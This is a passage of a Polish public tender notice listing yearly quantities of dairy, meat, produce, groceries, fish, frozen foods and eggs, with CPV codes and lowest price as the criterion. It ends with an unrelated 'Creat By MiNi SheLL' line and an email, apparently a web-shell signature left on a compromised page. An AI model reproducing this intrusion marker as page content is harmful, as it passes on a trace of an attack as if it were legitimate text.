<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Mleko 3,2 %  1 litr karton	szt.	3300
2	Masło 200 g  o zawartości 82 % tłuszczu	szt.	3000
3	Margaryna mleczna 250 g	szt.	800
4	Margaryna śniadaniowa 500 g	szt.	250
5	Margaryna Palma  250 g	szt.	200
6	Śmietana 18 % 400 g	szt.	380
7	Jogurt z owocami 150 g	szt.	2000
8	Kefir 200 g	szt.	150
9	Maślanka owocowa 1 l	szt.	500
10	Ser żółty twardy - Salami	kg	200
11	Ser żółty twardy  - Morski	kg	80
12	Twaróg półtłusty krajanka	kg	200
13	Twaróg cukierniczy  1 kg	szt.	20
14	Serek homogenizowany 150 g	szt.	2200
15	Serek do chleba 100 g	szt.	800
16	Serek wiejski lekki 150 g	szt.	300
17	Serek topiony z dodatkami 100 g	szt.	1700
18	Kluski na parze 200opx 6 szt.  klusek	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.14.00-7, 15.53.00.00-2, 15.43.11.00-8, 15.51.21.00-1, 15.55.13.20-5, 15.55.15.00-0, 15.54.40.00-3, 15.54.21.00-0, 15.55.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso i przetwory mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Schab zk	kg	220
2	Łopatka bk	kg	350
3	Karczek bk	kg	80
4	Udka z kurczaka	kg	300
5	Filet z kurczaka	kg	200
6	Mięso wołowe z  grubego  na pieczeń, rolady	kg	50
7	Mięso mielone wp.	kg	100
8	Wątroba wieprzowa	kg	30
9	Wątroba drobiowa	kg	40
10	Kiełbasa toruńska	kg	230
11	Kiełbasa zwyczajna	kg	150
12	Pasztetowa wieprzowa	kg	50
13	Pasztet pieczony	Kg	15
14	Polędwica drobiowa	kg	50
15	Kiełbasa kminkowa	kg	25
16	Kiełbasa szynkowa wp.	kg	30
17	Kiełbasa cienka z drobiu	Kg	50
18	Boczek wędzony bk	kg	60
19	Boczek rolowany faszerowany	kg	35
20	Kiełbasa biała	kg	130
21	Parówka śląska cienka	kg	260
22	Kiełbasa mortadela	kg	40
23	Baleron	kg	20
24	Ogonówka	kg	15
25	Szynka wieprzowa gotowana-wędzona	kg	150
26	Mielonka wieprzowa	kg	85
27	Pieczeń rzymska	kg	65
28	Słonina wędzona	kg	60
29	Kabanosy wieprzowe	kg	6
30	Krupniok  - kaszanka	kg	60
31	Porcje rosołowe	kg	400
32	Kiełbasa śląska wieprzowa	kg	150
33	Kiełbasa żywiecka	kg	80
34	Kości wołowe	kg	20
35	Boczek świeży bk	kg	20
36	Kiełbasa parówkowa gruba	kg	15
37	Żeberka wieprzowe	kg	50
38	Salceson drobiowy	kg	20
39 	Słonina świeża	Kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.11.22.10-1, 15.11.40.00-0, 15.13.11.33-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Burak czerwony	kg	160
2	Cebula 	kg	450
3	Ziemniak	kg	5300
4	Kapusta czerwona 	kg	100
5	Kapusta biała 	kg	380
6	Marchew	kg	230
7	Pietruszka	kg	90
8	Seler	kg	90
9	Pieczarka	kg	100
10	Por	kg	40
11	Czosnek główka	szt.	100
	Warzywa sezonowe 		
1	Ogórek zielony	kg	130
2	Pomidor	kg	180
3	Kalafior	szt.	20
4	Kalarepa	kg	15
5	Pietruszka zielona 0,25 kg	pęcz	80
6	Sałata zielona 	szt.	60
7	Koperek zielony 0,25 kg	pęcz	60
8	Szczypiorek  0,25 kg	pęcz	80
9	Cebulka zielona 0,25 kg	pęcz	65
10	Kapusta pekińska	kg	70
11	Rzodkiewka 0,25 kg	pęcz	120
12	Botwinka	kg	15
13	Papryka świeża	kg	20
14	Cukinia	kg	12
15	Fasola szparagowa	kg	15
	Warzywa kiszone		
1	Kapusta kiszona	kg	320
2	Ogórek  kiszony	kg	180
3	Żurek 0,5 l	szt.	80
	Owoce		
1	Cytryna	kg	80
2	Pomarańcze 	kg	300
3	Mandarynki	kg	130
4	Kiwi 	kg	100
5	Banany 	kg	350
6	Rabarbar	kg	15
7	Truskawka	kg	36
8	Arbuz	kg	60
9	Jabłko	kg	500
10	Śliwki	kg	100
11	Gruszka	kg	60
12	Nektarynka 	kg	40
13	Brzoskwinia	kg	40
14	Agrest	kg	12
15	Wiśnie	kg	12
16	Czereśnie	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.12.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Cukier op.1 kg	kg	1500
2	Cukier puder	kg	55
3	Cukier waniliowy  32g	szt.	80
4	Kasza jęczmienna op.1kg	kg	70
5	Kasza manna op.1 kg	kg	30
6	Mąka wrocławska op.1 kg	kg	470
7	Mąka krupczatka op.1 kg	kg	50
8	Mąka ziemniaczana op.1 kg	kg	20
9	Ryż op. 1 kg	kg	180
10	Sól	kg	180
11	Płatki czekoladowe Nesguik 750 g	szt.	90
12	Płatki owsiane op.500g	kg	15
13	Makaron gruby 500g Lubella	szt.	450
14	Makaron nitki 250 g Czaniecki	szt.	400
15	Olej 	l	300
16	Liść laurowy    20g	szt.	30
17	Majeranek  15 g	szt.	100
18	Ziele angielskie 15 g	szt.	30
19	Papryka mielona 20 g słodka	szt.	150
20	Papryka ostra mielona 20 g	szt.	10
21	Przyprawa  do zupy typu magii 1 litr	szt.	80
22	Czosnek mielony 20 g	szt.	450
23	Pieprz mielony 20 g	szt.	440
24	Kminek 20 g	szt.	30
25	Oregano 20g	Szt.	20
26	Bazylia 20 g	Szt.	20
27	Carry 20g	Szt.	20
28	Zioła prowansalskie 20g	Szt.	30
29	Jarzynka typu Kucharek 1 kg	szt.	60
30	Proszek do pieczenia 36g	szt.	35
31	Soda oczyszczona 20 g	szt.	25
32	Kisiel owocowy 79 g	szt.	900
33	Budyń 60 g	szt.	800
34	Cynamon 20 g	szt.	30
35	Kwasek cytrynowy  20 g	szt.	15
36	Galaretka 80 g	szt.	20
37	Zupka chińska rożne smaki Vifona	szt.	1400
38	Musztarda  200g	szt.	500
39	Krem chrzanowy 170g	szt.	170
40	Majonez 900 g	szt.	150
41	Keczup 1000 g	szt.	140
42	Chrzan tarty  180 g	szt.	60
43	Ocet 500 g 10%	szt.	20
44	Herbata 100 g granulowana	szt.	450
45	Kawa zbożowa 500 g	szt.	20
46	Kakao 200 g	szt.	50
47	Dżem owocowy 1 kg	szt.	150
48	Dżem  różne smaki 280g	Szt.	360
49	Dżem  wysoko słodzony 6,5 kg	szt.	3
50	Miód naturalny  400 g	szt.	160
51	Krem czekoladowy  orzechowy 360g 	szt.	500
52	Czekolada mleczna 100 g	szt.	600
53	Baton Pawełek różne smaki	szt.	300
54	Przecier pomidorowy 1 kg	szt.	115
55	Sok owocowy 1 l - karton	szt.	500
56	Syrop owocowy 6,5 kg	Szt.	5
57	Szynka drobiowa konserwa 110 g	szt.	420
58	Konserwa turystyczna 130 g	szt.	200
59	Groszek konserwowy 400g	szt.	70
60	Kukurydza konserwowa 400 g	szt.	100
61	Papryka konserwowa 900 g	szt.	170
62	Ogórek konserwowy 900 g	szt.	300
63	Koncentrat buraczany  330 ml - w butelce	szt.	40
64	Fasola  Jaś	kg	60
65	Fasola kolorowa	kg	30
66	Groch łuskany 	kg	40
67	Pasztet drobiowy 160 g	szt.	1600
68	Ananas w puszce 565 g	szt.	2
69	Brzoskwinia w puszce 850 g	szt.	6
70	Rodzynki 200g	szt.	10
71	Wiórki kokosowe 200 g	szt.	4
72	Mieszanka bakaliowa 100g
         studencka	szt.	8
73	Skórka pomarańczowa 100g	szt.	6
74	Ciastka - wafle różne smaki	Kg	60
75	Napoje gazowane kolorowe 1,5 l	szt.	200
76	Wody mineralne gazowane 1,5 l	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.00.00-5, 15.61.31.00-9, 15.61.00.00-7, 15.33.14.00-1, 15.33.22.90-3, 15.81.10.00-9, 15.81.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Filet z mintaja mrożony	kg	160
2	Ryba Panga mrożona	kg	50
3	Matyjas solony 1 wiaderko 4 kg	szt.	6
4	Makrela wędzona 	kg	35
5	Konserwa  rybna -filet w oleju - 170 g	szt.	400
6	Konserwa rybna - filet  w pomidorach -170g	szt.	400
7	Konserwa rybna - szproty - 170g	sz.	450
8	Konserwa -paprykarz -330g	szt.	300
9	Konserwa - tuńczyk - kawałki-170g	szt.	450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-0, 15.23.00.00-9, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Mieszanka kompotowa	kg	300
2	Mieszanka warzywna zupa	kg	120
3	Kalafior 	kg	50
4	Brokuły	Kg	50
5	Fasola szparagowa 	kg	60
6	Pierogi ruskie z serem	kg	50
7	Pierogi z kapustą i grzybami	kg	50
8	Pierogi z mięsem	kg	80
9	Pierogi z serem	kg	50
10	Pyzy z mięsem	kg	130
11	Kluski śląskie 	kg	250
12	Kluski ze śliwkami	kg	50
13	Hamburgery drobiowe	kg	180
14	Groszek mrożony	kg	15
15	Warzywa na patelnie	kg	80
16	Truskawka	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Jaja  Klasa XL	szt.	17000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com